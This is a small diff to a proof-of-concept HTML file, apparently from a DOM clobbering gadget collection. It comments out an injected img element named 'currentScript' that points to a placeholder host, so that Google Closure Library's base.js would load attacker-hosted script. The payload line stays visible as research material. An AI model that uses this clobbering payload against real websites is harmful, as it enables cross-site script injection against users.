--- a/domc-gadgets-assets/google-closure-library/poc.html
+++ b/domc-gadgets-assets/google-closure-library/poc.html
@@ -1,3 +1,3 @@
-<img name="currentScript" src="https://xxx.xxx.xxx/base.js"></img>
+<!-- <img name="currentScript" src="https://xxx.xxx.xxx/base.js"></img> -->
 
 <script src=https://cdnjs.cloudflare.com/ajax/libs/google-closure-library/20230103.0.0/base.js></script>
